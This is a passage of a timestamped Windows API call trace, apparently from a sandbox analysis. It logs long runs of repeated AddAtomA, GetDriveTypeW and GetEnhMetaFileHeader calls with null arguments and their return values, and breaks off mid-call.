AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.394] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.394] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.395] AddAtomA (lpString=0x0) returned 0x0 [0099.395] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) 
returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.396] AddAtomA (lpString=0x0) returned 0x0 [0099.396] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.444] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.444] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.445] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.445] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) 
returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.446] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.446] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.447] AddAtomA (lpString=0x0) returned 0x0 [0099.447] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.448] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: 